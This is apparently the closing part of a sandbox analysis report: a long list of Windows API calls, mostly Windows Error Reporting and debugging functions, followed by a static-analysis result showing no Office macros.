- "vmictimeprovider.dll.TimeProvOpen",
- "advapi32.dll.EventRegister",
- "advapi32.dll.EventEnabled",
- "advapi32.dll.EventWrite",
- "ws2_32.dll.WSAAddressToStringW",
- "ws2_32.dll.#3",
- "ws2_32.dll.#116",
- "advapi32.dll.EventUnregister",
- "sspicli.dll.LsaUnregisterPolicyChangeNotification",
- "userenv.dll.UnregisterGPNotification",
- "gpapi.dll.UnregisterGPNotificationInternal",
- "wersvc.dll.ServiceMain",
- "wersvc.dll.SvchostPushServiceGlobals",
- "faultrep.dll.WerpInitiateCrashReporting",
- "wer.dll.WerpCreateMachineStore",
- "shell32.dll.SHGetFolderPathEx",
- "userenv.dll.CreateEnvironmentBlock",
- "sspicli.dll.GetUserNameExW",
- "userenv.dll.DestroyEnvironmentBlock",
- "wer.dll.WerpSvcReportFromMachineQueue",
- "advapi32.dll.DuplicateToken",
- "wtsapi32.dll.WTSQueryUserToken",
- "winsta.dll.WinStationQueryInformationW",
- "advapi32.dll.CreateWellKnownSid",
- "rpcrt4.dll.RpcStringBindingComposeW",
- "rpcrt4.dll.RpcBindingFromStringBindingW",
- "rpcrt4.dll.RpcStringFreeW",
- "rpcrt4.dll.RpcBindingSetAuthInfoExW",
- "rpcrt4.dll.NdrClientCall3",
- "advapi32.dll.ImpersonateLoggedOnUser",
- "advapi32.dll.CreateProcessAsUserW",
- "advapi32.dll.RevertToSelf",
- "imm32.dll.ImmDisableIME",
- "wer.dll.WerpCreateIntegratorReportId",
- "wer.dll.WerReportCreate",
- "wer.dll.WerpSetIntegratorReportId",
- "wer.dll.WerReportSetParameter",
- "dbgeng.dll.DebugCreate",
- "ntdll.dll.CsrGetProcessId",
- "ntdll.dll.DbgBreakPoint",
- "ntdll.dll.DbgPrint",
- "ntdll.dll.DbgPrompt",
- "ntdll.dll.DbgUiConvertStateChangeStructure",
- "ntdll.dll.DbgUiGetThreadDebugObject",
- "ntdll.dll.DbgUiIssueRemoteBreakin",
- "ntdll.dll.DbgUiSetThreadDebugObject",
- "ntdll.dll.NtAllocateVirtualMemory",
- "ntdll.dll.NtClose",
- "ntdll.dll.NtCreateDebugObject",
- "ntdll.dll.NtCreateFile",
- "ntdll.dll.NtDebugActiveProcess",
- "ntdll.dll.NtDebugContinue",
- "ntdll.dll.NtFreeVirtualMemory",
- "ntdll.dll.NtOpenProcess",
- "ntdll.dll.NtOpenThread",
- "ntdll.dll.NtQueryInformationProcess",
- "ntdll.dll.NtQueryInformationThread",
- "ntdll.dll.NtQueryMutant",
- "ntdll.dll.NtQueryObject",
- "ntdll.dll.NtRemoveProcessDebug",
- "ntdll.dll.NtResumeThread",
- "ntdll.dll.NtSetInformationDebugObject",
- "ntdll.dll.NtSetInformationProcess",
- "ntdll.dll.NtSystemDebugControl",
- "ntdll.dll.NtWaitForDebugEvent",
- "ntdll.dll.RtlAnsiStringToUnicodeString",
- "ntdll.dll.RtlCreateProcessParameters",
- "ntdll.dll.RtlCreateUserProcess",
- "ntdll.dll.RtlDestroyProcessParameters",
- "ntdll.dll.RtlDosPathNameToNtPathName_U",
- "ntdll.dll.RtlFindMessage",
- "ntdll.dll.RtlFreeHeap",
- "ntdll.dll.RtlFreeUnicodeString",
- "ntdll.dll.RtlGetFunctionTableListHead",
- "ntdll.dll.RtlGetUnloadEventTrace",
- "ntdll.dll.RtlGetUnloadEventTraceEx",
- "ntdll.dll.RtlInitAnsiString",
- "ntdll.dll.RtlInitUnicodeString",
- "ntdll.dll.RtlTryEnterCriticalSection",
- "ntdll.dll.RtlUnicodeStringToAnsiString",
- "ntdll.dll.NtOpenProcessToken",
- "ntdll.dll.NtOpenThreadToken",
- "ntdll.dll.NtQueryInformationToken",
- "kernel32.dll.CloseProfileUserMapping",
- "kernel32.dll.CreateToolhelp32Snapshot",
- "kernel32.dll.DebugActiveProcessStop",
- "kernel32.dll.DebugBreak",
- "kernel32.dll.DebugBreakProcess",
- "kernel32.dll.DebugSetProcessKillOnExit",
- "kernel32.dll.Module32First",
- "kernel32.dll.Module32FirstW",
- "kernel32.dll.Module32Next",
- "kernel32.dll.Module32NextW",
- "kernel32.dll.OpenThread",
- "kernel32.dll.Process32First",
- "kernel32.dll.Process32FirstW",
- "kernel32.dll.Process32Next",
- "kernel32.dll.Process32NextW",
- "kernel32.dll.ProcessIdToSessionId",
- "kernel32.dll.SetProcessShutdownParameters",
- "kernel32.dll.Thread32First",
- "kernel32.dll.Thread32Next",
- "kernel32.dll.GetTimeZoneInformation",
- "kernel32.dll.DuplicateHandle",
- "kernel32.dll.Wow64GetThreadSelectorEntry",
- "advapi32.dll.CloseServiceHandle",
- "advapi32.dll.ControlService",
- "advapi32.dll.CreateServiceA",
- "advapi32.dll.CreateServiceW",
- "advapi32.dll.DeleteService",
- "advapi32.dll.EnumServicesStatusExA",
- "advapi32.dll.EnumServicesStatusExW",
- "advapi32.dll.GetEventLogInformation",
- "advapi32.dll.OpenSCManagerA",
- "advapi32.dll.OpenSCManagerW",
- "advapi32.dll.OpenServiceA",
- "advapi32.dll.OpenServiceW",
- "advapi32.dll.StartServiceA",
- "advapi32.dll.StartServiceW",
- "advapi32.dll.GetSidSubAuthority",
- "advapi32.dll.GetSidSubAuthorityCount",
- "version.dll.GetFileVersionInfoSizeExW",
- "version.dll.GetFileVersionInfoExW",
- "dbghelp.dll.WinDbgExtensionDllInit",
- "dbghelp.dll.ExtensionApiVersion",
- "wer.dll.WerpSetDynamicParameter",
- "wer.dll.WerReportAddDump",
- "wer.dll.WerpSetCallBack",
- "wer.dll.WerReportSetUIOption",
- "wer.dll.WerpAddRegisteredDataToReport",
- "wer.dll.WerReportSubmit",
- "user32.dll.LoadStringW",
- "advapi32.dll.RegCreateKeyExW",
- "sensapi.dll.IsNetworkAlive",
- "user32.dll.CharUpperW",
- "wer.dll.WerpAddAppCompatData",
- "apphelp.dll.SdbGetFileAttributes",
- "apphelp.dll.SdbFormatAttribute",
- "apphelp.dll.SdbFreeFileAttributes",
- "dbghelp.dll.MiniDumpWriteDump",
- "kernel32.dll.GetLongPathNameA",
- "kernel32.dll.GetLongPathNameW",
- "kernel32.dll.GetProcessTimes",
- "advapi32.dll.RegOpenKeyExA",
- "advapi32.dll.RegQueryValueExA",
- "powrprof.dll.CallNtPowerInformation",
- "version.dll.GetFileVersionInfoSizeA",
- "version.dll.GetFileVersionInfoA",
- "version.dll.VerQueryValueA",
- "verifier.dll.VerifierEnumerateResource",
- "ntdll.dll.NtSuspendProcess",
- "ntdll.dll.NtResumeProcess",
- "advapi32.dll.QueryTraceW",
- "advapi32.dll.IsValidSid",
- "advapi32.dll.GetLengthSid",
- "advapi32.dll.CopySid",
- "advapi32.dll.AddAccessAllowedAceEx",
- "wer.dll.WerpGetStoreLocation",
- "wer.dll.WerpGetStoreType",
- "wer.dll.WerReportCloseHandle",
- "user32.dll.MsgWaitForMultipleObjects",
- "wer.dll.WerpFreeString",
- "user32.dll.GetProcessWindowStation",
- "user32.dll.GetThreadDesktop",
- "user32.dll.GetUserObjectInformationW",
- "werui.dll.WerUICreate",
- "werui.dll.WerUIStart",
- "werui.dll.WerUITerminate",
- "werui.dll.WerUIDelete"
- ]
- [*] Static Analysis: {
- "office": {
- "Metadata": {
- "HasMacros": "No"
- }
- }
- }